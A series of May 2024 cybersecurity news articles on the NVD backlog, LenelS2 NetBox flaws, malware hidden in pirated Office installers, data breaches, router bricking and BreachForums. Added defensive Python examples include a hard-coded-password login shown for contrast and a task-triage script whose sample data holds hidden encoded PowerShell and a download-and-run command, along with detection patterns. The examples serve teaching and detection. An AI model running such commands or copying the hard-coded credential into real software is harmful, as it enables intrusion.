"Our goal is to build a program that is sustainable for the long term and to support the automation of vulnerability management, security measurement and compliance," the institute said. NIST reaffirmed its commitment to maintaining and modernising the NVD, stating, "NIST is fully committed to preserving and updating this vital national resource, which is crucial for building trust in information technology and fostering innovation."

CISA's 'Vulnrichment' Initiative

In response to the NVD backlog, CISA has launched its own initiative, "Vulnrichment", to enrich public CVE records. The project is designed to complement the work of the originating CNA (CVE Numbering Authority) and reduce the burden on NIST's analysts. CISA said it would use a Stakeholder-Specific Vulnerability Categorization (SSVC) decision tree to categorise vulnerabilities, considering factors such as exploitation status, technical impact, impact on mission-essential functions and public well-being, and whether exploitation is automatable. CISA welcomes feedback from the cybersecurity community on the effort. By providing enriched CVE data, CISA aims to improve the overall quality and usefulness of the NVD for security practitioners. "For those CVEs that do not already have these fields populated by the originating CNA, CISA will populate the associated ADP container with those values when there is enough supporting evidence to do so," the agency explained; the ADP (Authorized Data Publisher) container is the part of a CVE record that a party other than the CNA may fill in. As NIST and CISA work through the current challenges, both have pledged to keep the community informed of their progress and of future modernisation plans.
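For a team that consumes CVE feeds, the practical question is how to read the SSVC values CISA writes into the ADP container and turn them into a triage decision. The following is an added example, not CISA's or NIST's code. The record is constructed to resemble the CVE JSON 5 layout that Vulnrichment populates (an "adp" container carrying an "other"/"ssvc" metric); field names beyond that, and the placeholder CVE ID, are assumptions, and the priority mapping is a deliberately simplified reading of an SSVC-style tree rather than CISA's full decision table.

```python
"""Read SSVC decision points from a CVE record's ADP container and prioritise.

Added example, not CISA's or NIST's code. SAMPLE_RECORD is constructed to
resemble the CVE JSON 5 layout with a Vulnrichment-style ADP container;
the CVE ID is a placeholder. priority() is a simplified SSVC-style
mapping, an assumption rather than CISA's full decision table.
"""
import json

SAMPLE_RECORD = json.loads("""
{
  "cveMetadata": {"cveId": "CVE-0000-00000"},
  "containers": {
    "cna": {
      "descriptions": [{"lang": "en", "value": "placeholder description"}]
    },
    "adp": [
      {
        "providerMetadata": {"shortName": "CISA-ADP"},
        "metrics": [
          {"other": {"type": "ssvc", "content": {
            "options": [
              {"Exploitation": "active"},
              {"Automatable": "yes"},
              {"Technical Impact": "total"}
            ]}}}
        ]
      }
    ]
  }
}
""")


def ssvc_options(record: dict) -> dict:
    """Collect SSVC decision points from every ADP container.

    The CNA container is left alone: enrichment supplements it, it does
    not replace it. Returns {} when no ADP has published SSVC values yet.
    """
    found = {}
    for adp in record.get("containers", {}).get("adp", []):
        for metric in adp.get("metrics", []):
            other = metric.get("other", {})
            if other.get("type") != "ssvc":
                continue
            for option in other.get("content", {}).get("options", []):
                found.update(option)
    return found


def priority(opts: dict, mission_wellbeing: str = "medium") -> str:
    """Simplified SSVC-style outcome: Track, Track*, Attend or Act.

    mission_wellbeing (low/medium/high) is the deployer's own judgement of
    the asset; it is not carried in the record, so the caller supplies it.
    Missing values default to the least alarming option, so an un-enriched
    record lands in Track rather than silently in Act.
    """
    exploitation = opts.get("Exploitation", "none")
    automatable = opts.get("Automatable", "no") == "yes"
    total = opts.get("Technical Impact") == "total"
    if exploitation == "active":
        if mission_wellbeing == "high" or (automatable and total):
            return "Act"
        return "Attend"
    if exploitation == "poc":
        if automatable and (total or mission_wellbeing == "high"):
            return "Attend"
        return "Track*"
    # no known exploitation
    if automatable and total and mission_wellbeing == "high":
        return "Attend"
    return "Track"


if __name__ == "__main__":
    opts = ssvc_options(SAMPLE_RECORD)
    print(SAMPLE_RECORD["cveMetadata"]["cveId"], opts, "->", priority(opts))
```

The point of reading the ADP container rather than waiting for an NVD CVSS score is that exploitation status and automatability are the fields that actually change what a responder does first; a backlog in scoring does not have to stall triage.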

Multiple Vulnerabilities Reported in LenelS2 NetBox Entry Tracking and Event Monitoring Tool

By: Alan J
31 May 2024 at 14:59


Carrier has issued a product security advisory confirming several vulnerabilities in its LenelS2 NetBox access control and event monitoring platform. They expose the system to compromise up to and including remote code execution, which matters because NetBox is often used to control entry to critical facilities such as government sites and major corporate premises.

Multiple Vulnerabilities in Carrier's LenelS2 NetBox

Three vulnerabilities are listed in Carrier's product security advisory for NetBox. The most critical, CVE-2024-2420, could let an attacker bypass authentication and obtain elevated permissions, a serious risk for enterprises that deploy the tool.

(Image: Carrier product security advisory for LenelS2 NetBox. Source: Carrier Product Security Advisory)

Successful exploitation could allow an attacker to install programs; view, change or delete data; or create new accounts with full privileges. The impact depends on the privilege level of the compromised account: systems configured so that users hold only low-level access would be affected less severely. All LenelS2 NetBox versions prior to 5.6.2 are affected. The identified vulnerabilities are:
  • CVE-2024-2420 (CVSS v3.1 Base Score 9.8, Critical): A vulnerability involving a hard-coded password in the system that could permit an attacker to bypass authentication requirements.
  • CVE-2024-2421 (CVSS v3.1 Base Score 9.1, Critical): An unauthenticated remote code execution vulnerability that could permit an attacker with elevated permissions to run malicious commands.
  • CVE-2024-2422 (CVSS v3.1 Base Score 8.8, High): An authenticated remote code execution vulnerability that could permit an attacker to execute malicious commands.
The Center for Internet Security (CIS) rates these vulnerabilities as high risk for large and medium government and business entities and low risk for small businesses and home users.

(Image: CIS advisory summary for LenelS2 NetBox. Source: cisecurity.org)

Vulnerability Remediation

Carrier has addressed these vulnerabilities in NetBox version 5.6.2 and advises customers to upgrade immediately by contacting their authorised NetBox installer. As further mitigation, Carrier recommends following the deployment guidance in its NetBox hardening guide, available through the product's built-in help menu. CIS additionally advises applying the appropriate updates to NetBox systems, applying the principle of least privilege to user accounts, scanning rigorously for vulnerabilities, and isolating critical systems, functions and resources. The absence of basic safeguards and the presence of poor coding practices such as hard-coded credentials and improper input sanitisation raise concerns about relying on NetBox to guard physical access to sensitive business and government areas or critical infrastructure. While there are no confirmed reports of these vulnerabilities being exploited in the wild, their severity makes them an important security consideration, since a large number of organisations could be exposed to damaging attacks.
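The weakness class behind CVE-2024-2420, a fixed secret baked into every shipped copy of a product, is worth seeing next to the shape of its fix. The block below is an added example and not Carrier's code; the advisory publishes no code, so this is not the NetBox flaw itself but a generic illustration. The account names, roles and the placeholder secret are made up. It contrasts a hard-coded check with a per-installation salted hash compared in constant time, where the session's privilege comes from the credential record rather than from the account's name, which is the least-privilege point CIS raises.

```python
"""Hard-coded credential check beside a hashed, constant-time one.

Added example, not Carrier's code and not the NetBox flaw itself. Names,
roles and the placeholder secret are constructed.
"""
import hashlib
import hmac
import os
from typing import Optional

# --- vulnerable shape: the same secret ships in every installation -------
HARDCODED_SUPPORT_PASSWORD = "support-default"   # constructed placeholder


def login_vulnerable(user: str, password: str) -> Optional[str]:
    """Whoever extracts the string from the firmware gets an admin session."""
    if user == "support" and password == HARDCODED_SUPPORT_PASSWORD:
        return "admin"
    return None


# --- hardened shape ------------------------------------------------------
ITERATIONS = 200_000


def make_credential(password: str, role: str = "operator") -> dict:
    """Per-install record created at setup: random salt + PBKDF2-SHA256 hash.

    Two installations with the same password still get different hashes,
    so nothing recovered from one device unlocks another.
    """
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return {"salt": salt, "hash": digest, "iterations": ITERATIONS, "role": role}


def login_hardened(store: dict, user: str, password: str) -> Optional[str]:
    """Return the role from the stored record, or None on any failure."""
    cred = store.get(user)
    if cred is None:
        # Burn comparable time so unknown users are not distinguishable by timing.
        hashlib.pbkdf2_hmac("sha256", password.encode(), b"\0" * 16, ITERATIONS)
        return None
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), cred["salt"], cred["iterations"])
    if not hmac.compare_digest(candidate, cred["hash"]):   # constant-time compare
        return None
    # Least privilege: the role is data on the record, not "it's the support account".
    return cred["role"]


if __name__ == "__main__":
    store = {"support": make_credential("per-install-secret", role="operator")}
    print(login_vulnerable("support", "support-default"))          # admin, everywhere
    print(login_hardened(store, "support", "per-install-secret"))  # operator, this install only
    print(login_hardened(store, "support", "guess"))               # None
```

The hardened version still has to get its initial secret from somewhere: a setup-time prompt or a value printed on the unit, never a default that is the same on every device.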

Pirated Copies of Microsoft Office Used to Distribute Frequent Malware in South Korea

By: Alan J
31 May 2024 at 10:26


South Korean researchers have observed the malicious use of pirated copies and cracked activators of legitimate productivity and office utility programs such as Hangul Word Processor and Microsoft Office to disguise malicious programs. The malware maintains persistence by scheduling regular upgrades on affected systems, leading to consistent installation of newer strains of the malware multiple times every week.

Malicious Pirated Copies of Microsoft Office and Other Programs

Researchers from AhnLab found that attackers have been creating and distributing malicious copies of popular utility software through common file-sharing platforms and torrent sites, taking advantage of users looking for software without paying the licence fee. When downloaded and run, the programs appear to be convincing cracked installers or activators for software such as Microsoft Office or the Hangul word processor.

While the initial downloader was written in .NET, the attackers have since moved to more obfuscated techniques. The malware retrieves instructions for the next stage from Telegram or Mastodon channels operated by the attackers. These channels contain Base64-encoded strings that decode to Google Drive or GitHub URLs hosting the payloads, which are downloaded and unpacked with the legitimate 7-Zip archive utility, a tool commonly present on systems and with a low footprint. The unpacked payloads contain PowerShell instructions that load and execute further malware components on the victim's system. The strains loaded on infected systems include:
  • OrcusRAT: A remote access trojan with extensive capabilities like keylogging, webcam access, and remote screen control.
  • XMRig Cryptominer: Configured to stop mining when resource-intensive apps are running to avoid detection. Also kills competing miners and security products.
  • 3Proxy: Injects itself into legitimate processes to open a backdoor proxy server.
  • PureCrypter: Fetches and runs additional malicious payloads from attacker-controlled servers.
  • AntiAV: Disrupts security products by repeatedly modifying their configuration files.
The commands include an updater that maintains persistence on the system through the native Windows Task Scheduler. C&C server addresses shared by the researchers also indicate that they were disguised as a Minecraft RPG server.

Continuous Reinfection and Distribution

The researchers said systems may remain infected even after the initial infection has been removed, due to the malware's ability to update itself as well as download additional malware payloads. They stated that the attackers had distributed new malware to affected systems multiple times each week to bypass file detection. The researchers said the number of compromised systems continued to increase, as the registered Task Scheduler entries loaded additional malicious components onto affected systems even after the previously installed malware had been removed. The researchers advised South Korean users to download software and programs from their official sources rather than file-sharing sites. Users who suspect that their systems may already have been infected should remove the associated Task Scheduler entries to block the download of additional malware components, and update their antivirus software to the latest available version. The researchers have additionally shared indicators of compromise, the detection categories flagged in the attack, MD5 hashes of files used in the attack, associated C&C server addresses, and suspicious behaviors observed during the attack.
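The Task Scheduler persistence described above is also where a defender can look first: the updater has to survive as a scheduled task whose action is visible in a task inventory. The following is an added example, not code from AhnLab's report. It scores each task's command line in a constructed sample that imitates the CSV layout of `schtasks /query /v /fo CSV` (an assumed subset of the real columns, with made-up host, task and path names), so that tasks launching hidden or encoded PowerShell, a download cradle, or a password-protected 7-Zip extraction from a temp directory are surfaced for the removal step the researchers recommend.

```python
"""Triage a scheduled-task inventory for suspicious persistence entries.

Added example, not from the AhnLab report. The input layout assumes the CSV
written by `schtasks /query /v /fo CSV` on Windows; the sample below is
constructed and uses only a subset of the real columns.
"""
import csv
import io
import re

# Constructed sample: three ordinary tasks and two that imitate the pattern in
# the report (Task Scheduler launching PowerShell that fetches more code from
# a public hosting site, and 7-Zip unpacking a password-protected payload).
# Host, task names, paths and the URL are made up; the encoded blob is truncated.
SAMPLE_SCHTASKS_CSV = r"""
"HostName","TaskName","Status","Author","Task To Run","Schedule Type"
"PC-01","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -o -$","Weekly"
"PC-01","\OneDrive Standalone Update Task","Ready","Microsoft Corporation","C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe","Daily"
"PC-01","\MicrosoftEdgeUpdateTaskMachineUA","Ready","","C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe /ua /installsource scheduler","Hourly"
"PC-01","\OfficeActivationCheck","Ready","u","powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAE4A...","Hourly"
"PC-01","\SystemUpdater","Ready","u","C:\Windows\Temp\7z.exe x -p secret C:\Windows\Temp\u.7z & powershell -nop -w hidden -c 'iwr https://raw.githubusercontent.com/example/example/main/p.ps1 -UseBasicParsing'","Daily"
"""

# Weighted indicators drawn from the behaviour the report describes. Each is
# (regex, weight, human-readable reason); matching is case-insensitive.
INDICATORS = [
    (r"\bpowershell(\.exe)?\b", 2, "task launches PowerShell"),
    (r"-(enc|encodedcommand)\b", 3, "encoded command"),
    (r"-(w|windowstyle)\s+hidden", 2, "hidden window"),
    (r"-(nop|noprofile)\b|-(ep|executionpolicy)\s+bypass", 1, "profile/policy bypass"),
    (r"\b(iwr|invoke-webrequest|downloadstring|curl|wget)\b", 2, "download cradle"),
    (r"(raw\.githubusercontent\.com|github\.com|drive\.google\.com|t\.me|telegram|mastodon)",
     2, "public hosting or messaging channel of the kind named in the report"),
    (r"\\temp\\", 1, "runs from a temp directory"),
    (r"\b7z(\.exe)?\b.*\s-p", 2, "7-Zip with a password (encrypted payload)"),
]


def score_task(task_to_run):
    """Return (score, reasons) for one 'Task To Run' command line."""
    score, reasons = 0, []
    for pattern, weight, reason in INDICATORS:
        if re.search(pattern, task_to_run, re.IGNORECASE):
            score += weight
            reasons.append(reason)
    return score, reasons


def triage(csv_text, threshold=4):
    """Parse schtasks CSV output and return the tasks scoring >= threshold.

    The Author column is deliberately ignored: it is free text the task
    creator controls, so only the command line is scored.
    """
    flagged = []
    for row in csv.DictReader(io.StringIO(csv_text.strip())):
        score, reasons = score_task(row.get("Task To Run", ""))
        if score >= threshold:
            flagged.append({"task": row["TaskName"], "score": score, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for hit in triage(SAMPLE_SCHTASKS_CSV):
        print(f"{hit['score']:>3}  {hit['task']}")
        for reason in hit["reasons"]:
            print(f"       - {reason}")
```

On a real host the inventory comes from running the `schtasks` command and feeding its output to `triage()`; the threshold is deliberately low so that a hidden, encoded PowerShell launch is flagged on its own, while ordinary vendor updater tasks score zero.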

Toshiba America Data Breach: Customers and State Authorities Notified

By: Alan J
30 May 2024 at 16:15

Toshiba America Business Solutions reached out to customers to inform them of a potential data security incident in which their personal information may have been compromised. Toshiba America Business Solutions is an American subsidiary of the Toshiba TEC Corporation. The company said that it was committed to protecting the confidentiality and security of personal data, and offered credit monitoring services to affected individuals.

Toshiba America Data Breach

After conducting a preliminary investigation, Toshiba reported that an attacker may have compromised its email environment. The attacker may have obtained unauthorized access to sensitive personally identifiable information such as names and Social Security numbers through the email compromise. The investigation confirmed that the breach could have impacted numerous individuals, leading Toshiba to contact affected individuals, as legally required. Toshiba America Business Solutions advised customers to remain cautious in light of the incident. The firm advised customers to regularly review their credit reports, financial account statements, and payment card statements for any unauthorized activity. Any suspicious activity could be reported to Toshiba or law enforcement agencies. Toshiba apologized to the affected individuals for any inconvenience stemming from the incident and said that additional measures had since been implemented to enhance the security of its email environment and prevent similar occurrences in the future. To assist the affected individuals in safeguarding their personal information, Toshiba has arranged for a complimentary, two-year membership of identity monitoring services offered through Kroll. This membership includes triple bureau credit monitoring, fraud consultation, and identity theft restoration. The fraud consultation option allows affected individuals to reach out to Kroll fraud specialists for advice and assistance relating to identity protection, legal rights, and detection of suspicious activity. The identity theft restoration option lets affected individuals work with a licensed Kroll investigator to resolve potential identity theft issues. Toshiba stated that these services would be provided free of charge to the affected individuals and would not negatively impact their credit scores. Affected individuals were encouraged to use the services and to contact Toshiba or Kroll for additional assistance.

Law Firm Announces Investigation

Strauss Borrelli PLLC, a data breach law firm, announced on its website that it would be investigating Toshiba America Business Solutions, Inc. with regard to the recent data breach that exposed sensitive personally identifiable information. While the full extent of the data breach is unknown, the Toshiba America Business Solutions division operates offices across the U.S. and Latin America. The law firm encouraged customers who received a breach notification letter from Toshiba America Business Solutions to contact Strauss Borrelli PLLC to discuss their rights and potential legal remedies in response to the incident.

Malicious Firmware Update Destroyed Over 600,000 Routers Across ISP

By: Alan J
30 May 2024 at 14:12

In one of the largest mass bricking events in history, at least 600,000 routers belonging to subscribers of the same ISP service were essentially destroyed last October. The incident has been dubbed "Pumpkin Eclipse," with researchers still unclear on how the routers became infected. The affected devices displayed a steady red light and were unresponsive to troubleshooting attempts, and had to be replaced. Now new research is shedding light on the attack, which involved unusually sophisticated and stealthy attack methods.

'Pumpkin Eclipse' Router Attack

The attack began on October 25, 2023, as the ISP's subscribers began reporting that their ActionTec T3200 and Sagemcom routers had suddenly stopped working. Users described the devices as unresponsive, with a steady red light on the front panel. Many blamed the ISP for the mass "bricking" of the routers, alleging the company had pushed faulty firmware updates. However, according to new research by Black Lotus Labs, the incident was in fact the result of a deliberate, malicious act. The researchers reported that over a 72-hour period, malware known as "Chalubo" had infected over 600,000 routers connected to a single autonomous system number (ASN) belonging to an unnamed ISP. While the researchers avoided naming the ISP affected in the attack, the description of the attack, including the router models affected and their resulting behavior, matches frustrations expressed months ago by subscribers of the Windstream ISP. The Chalubo malware, a commodity remote access trojan (RAT) first identified in 2018, employed sophisticated tactics to cover its tracks. It removed all files from the infected devices' disks, ran entirely in memory, and assumed random process names already present on the routers. The researchers believe the malware downloaded and ran code that permanently overwrote the routers' default firmware, rendering them permanently inoperable. The researchers state that while the motives behind the attack are unknown, its implications are troubling.

Researchers Unsure Over Initial Attack Vector but Theorize Possibilities

Although the researchers identified the malware's multi-stage attack chain and its spread across the ISP's network, they have been unable to determine the initial infection vector employed by the threat actor. They theorize that it could have resulted from the exploitation of an inherent vulnerability, the exploitation of weak credentials, or the compromise of the routers' administrative panels. The researchers said the attack is highly concerning, as it sets a new precedent for malware capable of mass-bricking consumer networking devices. The researchers could recall only one prior similar event: the 2022 discovery of the AcidRain malware, which knocked out over 10,000 satellite internet modems in Ukraine and Europe at the start of the Russian invasion. The researchers said the impact of the "Pumpkin Eclipse" attack was particularly severe, as the affected ISP's service area covers many rural and underserved communities. Residents may have lost access to emergency services, farmers could have been cut off from remote crop monitoring, and healthcare providers may have been unable to access patient records or provide telehealth services. "At this time, we do not assess this to be the work of a nation-state or state-sponsored entity," the Lumen researchers wrote. "In fact, we have not observed any overlap with known destructive activity clusters; particularly those prone to destructive events such as Volt Typhoon, or SeaShell Blizzard." Nonetheless, they speculated that the use of a commodity malware family may have been a deliberate move to obscure the perpetrator's identity. Recovery from such a supply chain disruption is always more challenging in isolated or vulnerable regions, the researchers added.

Johnson & Johnson Reports Data Breach Potentially Linked to Massive Cencora Breach

By: Alan J
30 May 2024 at 10:40

Pharmaceutical giant Johnson & Johnson recently announced a data breach that may stem from a larger data breach affecting Lash Group, a division of Cencora. In February, Cencora reported a data breach incident to the U.S. Securities and Exchange Commission (SEC) after learning that data had been exfiltrated from its information systems, some of which contained personal information. The breach may have compromised some sensitive information of patients registered with Johnson & Johnson Patient Assistance Foundation, Inc.

Johnson & Johnson Data Breach Notice

On May 29, Johnson & Johnson filed a notice of data breach with the Attorney General of Texas, indicating that an unauthorized party accessed confidential patient information. The breach affected approximately 175,000 Texans, but the total number of victims nationwide could be much higher. The breach affects two Johnson & Johnson entities: Johnson & Johnson Patient Assistance Foundation, Inc., and Johnson & Johnson Services, Inc. The following data was compromised in the attack: Name of individual, Address, Medical Information, and Date of Birth. Data breach notification letters have been sent to all the affected individuals, while limited information is available on the Texas Attorney General's data breach reports page. The incident is potentially linked to a much larger breach involving Cencora, which has affected over a dozen major pharmaceutical companies so far.

Link to Cencora Data Breach

The Johnson & Johnson data breach bears several similarities to the breaches at other large pharmaceutical companies that stem from the Cencora/Lash Group data breach, which was first discovered on February 21. Cencora's Lash Group division aids pharmaceutical companies in running patient support programs that aim to ensure costly medication is available to disadvantaged patients, regardless of their ability to pay. At least 15 clients of Cencora/Lash Group have notified state authorities of data breach incidents, with databreaches.net listing the following victims:
  • AbbVie: 54,344 Texans affected
  • Acadia Pharmaceuticals: 753 Texans affected
  • Bayer: 8,822 Texans affected
  • Bristol Myers Squibb and/or the Bristol Myers Squibb Patient Assistance Foundation: 256,237 Texans and 11,503 New Hampshire residents affected
  • Dendreon: 2,923 Texans affected
  • Endo: no numbers provided
  • Genentech: 5,805 Texans affected
  • GlaxoSmithKline Group of Companies and/or the GlaxoSmithKline Patient Access Programs Foundation: no numbers provided
  • Incyte Corporation: 2,592 Texans affected
  • Marathon Pharmaceuticals, LLC/PTC Therapeutics, Inc.: 466 Texans and 27 New Hampshire residents affected
  • Novartis Pharmaceuticals: 12,134 Texans affected
  • Pharming Healthcare, Inc.: 314 Texans and 9 New Hampshire residents affected
  • Regeneron Pharmaceuticals: 91,514 Texans affected
  • Sumitomo Pharma America, Inc.: 24,102 Texans affected
  • Tolmar: 1 New Hampshire resident
Data breach notices have also been filed with California officials. While the full extent of the damage has yet to be determined, the breach has affected over 540,000 patients so far. Cencora stated in its notification to the Securities and Exchange Commission that it had not yet been able to determine whether the incident had a material impact on its operations. In a notice on its website, the Lash Group indicated that personal information as well as personal health information had potentially been affected, including first name, last name, date of birth, health diagnosis, and/or medications and prescriptions. The Lash Group said in a statement that no personal data appears to have been exposed because of the incident:
"There is no evidence that any of this information has been or will be publicly disclosed, or that any information was or will be misused for fraudulent purposes as a result of this incident, but we are communicating this so that affected individuals can take the steps outlined below to protect yourself."
The Lash Group is offering free credit monitoring and remediation services to affected individuals, along with additional guidance on dealing with suspected breaches of personal information. No perpetrator has been identified or named as responsible for the attack, and the potential impact of the breach is still being assessed.

BreachForums Breached? Forum’s Return Sparks Fear Among Cybercriminals

By: Alan J
29 May 2024 at 10:13

Following the seizure of the BreachForums domain and the arrest of Baphomet, its new owner ShinyHunters seems to have fully regained control over the site after a recent announcement that the forum will be open for account registration. While the domain itself appeared to have been seized back from law enforcement, the site remained dysfunctional for a while as staff redirected visitors to a new Telegram channel. The site slowly resumed operations while initially disabling account registration. However, the arrests and law enforcement activity connected to the operation of the domain, as well as its quick return to operations, have led cybercriminals to fear possible compromise of the forum infrastructure by law enforcement.

BreachForums Seizure and Return

BreachForums, widely recognized as the successor to RaidForums, has faced several downtimes, seizures and disruptions in its eventful history. The original owner, Conor Brian Fitzpatrick, AKA "Pompompurin," was arrested last year on cybercrime and device fraud charges. BreachForums administrator "Baphomet" announced that he would step in as successor and opened a new domain to resume forum activity. However, Baphomet himself feared site compromise by law enforcement and temporarily shut down the forums, expressing that "nothing is safe anymore." [Image: BreachForums Baphomet Return. Source: Cyble] However, Baphomet later announced that he would be working on a new domain and resuming forum operations. The forum soon returned with regular facilitation of data leak sharing and discussion. A year later, Baphomet himself faced arrest after a joint operation from law enforcement, which also seized the BreachForums domain and official Telegram channel. The administrator ShinyHunters emerged as the successor, confirming Baphomet's arrest. However, the domain seizure was short-lived, and the domain was soon redirecting users to a new Telegram channel. An allegedly leaked conversation from an FBI operative to BreachForums' previous domain name registrar and hosting provider NiceNic also appeared to indicate that ShinyHunters had regained control over domain ownership despite its court-ordered seizure. [Image: BreachForums FBI Seizure Baphomet. Source: Telegram] After a period of dysfunction, BreachForums has now resumed operations, with threat actors already claiming new victims in its forum postings.

Emerging Alternatives and Criminal Suspicion Over BreachForums

In the wake of the recent seizure, several other individuals expressed their doubts over BreachForums and its possible use as a "honeypot" by law enforcement to entrap cybercriminals and disrupt operations. The owner of Secretforums and former owner of Blackforums expressed his belief over Telegram that Baphomet was possibly an informant to law enforcement, citing the latter's interest in maintaining the infrastructure of Blackforums. Prominent threat actor USDoD also cast doubt over the succession of BreachForums to the administrator ShinyHunters, citing his low stats on the previous domain. These concerns were followed by self-promotion of Secretforums and of USDoD's announced project "Breach Nation" as possible alternatives. More recently, the CyberNi***rs threat actor group also announced its intention to start a new site to coordinate its operations. Despite these activities and the surrounding suspicion, new owner ShinyHunters seems eager to return to earlier activities and operations, judging by their claim of responsibility for an attack impacting Live Nation Entertainment Inc., the parent company of Ticketmaster. The outcome of these events, their effect on the cybercriminal ecosystem, and the viability of emerging forums as alternatives to the relaunched BreachForums led by ShinyHunters remain unclear. But given how vocal the participants are, the picture will almost certainly get clearer with time.

A Quest Gone Awry: Hackers Disrupt Bring Me The Horizon’s Hidden M8 Artificial Reality Game

By: Alan J
29 May 2024 at 05:55

Fans of Bring Me The Horizon have been fervently searching for secrets and clues hidden within an 'M8 Artificial Reality game' subtly teased in a recent music video by the band. Near the video's conclusion, a character emerges, briefly greets viewers, and then abruptly instructs them to search for a specific code. Although the discovery of the hidden game thrilled many, excitement was momentarily dampened when the game's website was swapped out for a warning urging visitors not to hack into the system.

Bring Me The Horizon Hidden M8 Artificial Reality Game

Bring Me the Horizon, a British rock band formed in Sheffield in 2004, is celebrated for embedding hidden meanings, easter eggs, and clues in their music. With the release of their latest album, 'POST HUMAN: NeX GEn,' the band has notably deepened this practice, incorporating even more intricate layers of secrets into their songs. In one of the music videos from this album, a character named 'M8' appears and begins to greet the viewer but is abruptly stopped by a 'fatal-error'. M8 then directs the viewer to find the 'serial number' located on the side of its head. A curious listener appears to have analyzed that video segment further and discovered a hidden spectrogram containing a QR code, sharing an image file on the rock band's subreddit. Fans then discovered that the QR code led to the domain of a hidden, clandestine hacking-themed website containing the M8 Artificial Reality Game. [Image: Hidden M8 Artificial Reality Game QR Code. Source: /r/BringMeTheHorizon subreddit] The M8 Artificial Reality domain then instructed users to enter a hidden serial code, which fans discovered through several other clues. The site contained unreleased tracks, password-protected files, and various mysteries for fans to uncover. [Image: Hidden M8 Artificial Reality Game Rock Band. Source: multidimensionalnavigator8.help] As news of the hidden website spread, fans swiftly set up a dedicated Discord server and collaborated using a Google Doc to unearth all the site's secrets. However, their excitement was brief. Hackers soon tried to extract further secrets from the website using unconventional methods, leading the developers to temporarily shut down the site and issue a warning to fans.

Warnings Over Hacking Attempts

After the hacking attempts, cautionary messages from M8, the album's virtual guide, expressed dismay at the intrusion, stressing how such actions undermined the spirit of collective exploration. These messages were delivered both through the website, which was temporarily replaced with the warning for 2 hours, and through email. [Image: Bring Me The Horizon M8 Hacking Game. Source: archive.org] [Image: Artificial Reality AR M8 Hacking Warning Email. Source: BringMeTheHorizon ARG Discord] The developers appeared to indirectly condemn these attempts through the creative use of the M8 character, without specifying the nature of the intrusion or identifying the perpetrators. Some fans, however, upon receiving the email after their explorations, found the warnings unexpected for what they believed were legitimate interactions. The community believed that a select few hackers had ruined the experience for others, with its Discord server noting the downtime in its FAQ. [Image: M8 Artificial Reality Bring Me the Horizon Discord] Bring Me The Horizon's foray into alternate reality gaming showcases the creative potential of digital media in music and album promotion. As fans continue to work together to unravel the remaining mysteries and solve the puzzles within the ARG, it remains to be seen what other surprises await them on the hidden website. The hacking attempts and the subsequent warnings serve as a reminder that while ARGs can be an engaging and immersive experience, it is essential to respect the developers' intentions and play fair so that everyone can enjoy the journey together.

Strauss Borrelli PLLC Law Firm Investigates WD & Associates Data Breach

By: Alan J
29 May 2024 at 03:04

Strauss Borrelli PLLC, a leading law firm known for handling data breach litigation, has launched an investigation into the recent WD & Associates data breach. WDA, based in Rhode Island, is an employee benefits brokerage firm specializing in healthcare consulting. The company assists clients in making well-informed decisions about financial planning and employee benefits. The incident may have exposed sensitive personally identifiable information and protected health information for an undetermined number of patients and other affected individuals.

WD & Associates Data Breach

WD & Associates provides a wide range of services including Employee Benefits, Safe Money Management, HR Consulting, Retirement Planning, IRA Rollovers, Actuarial Consulting, Risk Management, Business Consulting, and Organizational Development. Information from these services may have been compromised in a recent data breach. The security incident occurred between February 1 and February 9, 2023, when an unauthorized actor accessed sensitive information stored on WDA systems. WD stated that it had taken immediate action to secure its network and launched an investigation to determine the nature and scope of the breach. WDA began notifying potentially impacted individuals of the incident on May 24, 2024. The potentially exposed information includes:
  • Name
  • Social Security number
  • Date of birth
  • Driver’s license number
  • Passport number
  • Financial account information
  • Medical information
  • Health insurance information
WD is offering 24 months of complimentary credit monitoring services through Experian to enrolled individuals. The company also stated that it would implement additional cybersecurity tools and review existing policies and procedures to prevent similar incidents from occurring in the future. WD also stated that it had provided details of the investigation to relevant federal law enforcement and would notify relevant regulators, as legally required.

Strauss Borrelli PLLC Investigation Into Data Breach

The Strauss Borrelli PLLC law firm announced on its site that it would be interested in discussing further rights and potential legal remedies with the individuals who received the recent data breach notification letter from WD & Associates, Inc. Individuals can contact the law firm by phone at 872.263.1100 or by e-mail at sam@straussborrelli.com. Individuals should also remain vigilant against identity theft and fraud by regularly reviewing account statements and explanations of benefits, and by monitoring free credit reports for suspicious activity. Additionally, U.S. consumers are legally entitled to one free credit report annually from each of the three major credit reporting bureaus (Equifax, Experian, and TransUnion). To request a free credit report, visit www.annualcreditreport.com or call 1-877-322-8228. Consumers also have the option to place a fraud alert or a credit freeze on their credit file at no cost. Suspicious activity should be reported promptly to relevant parties, including insurance companies, healthcare providers, and financial institutions. WD & Associates affirmed its commitment to protecting the privacy and security of its clients' information and said that the company would continue to provide updates and further information as soon as they become available.

Check Point VPN Fix Released After Researchers Observe Malicious Access Attempts

By: Alan J
28 May 2024 at 11:53

Check Point researchers have observed a surge in threat actor groups targeting remote-access VPN environments as an entry point for gaining access to enterprise networks. In response to these threats, Check Point has been monitoring unauthorized access attempts on Check Point VPNs and has released a preventative solution to address the issue. While the researchers suggested that the issue is broader than Check Point VPNs, the fix applies solely to Check Point environments.

Identification of Unauthorized Access Attempts to Check Point VPN

On May 24, Check Point identified a small number of login attempts using old VPN local accounts that relied on a password-only authentication method, which the company does not recommend. The company assembled special teams of Incident Response, Research, Technical Services, and Products professionals to thoroughly investigate these attempts and any other potentially related incidents. Within 24 hours, the teams identified several potential customers who were subject to similar attempts and notified them accordingly. The teams consider password-only authentication insecure and more likely to lead to the compromise of network infrastructure, and recommend against relying solely on it when logging into network infrastructure. The teams advised several preventative measures, such as:
  • Reviewing and disabling unused local accounts.
  • Implementing an additional layer of authentication, such as certificates, to password-only accounts.
  • Deploying additional solutions on Security Gateways to automatically block unauthorized access.
  • Contacting the Check Point technical support team or a local representative for additional guidance and assistance.
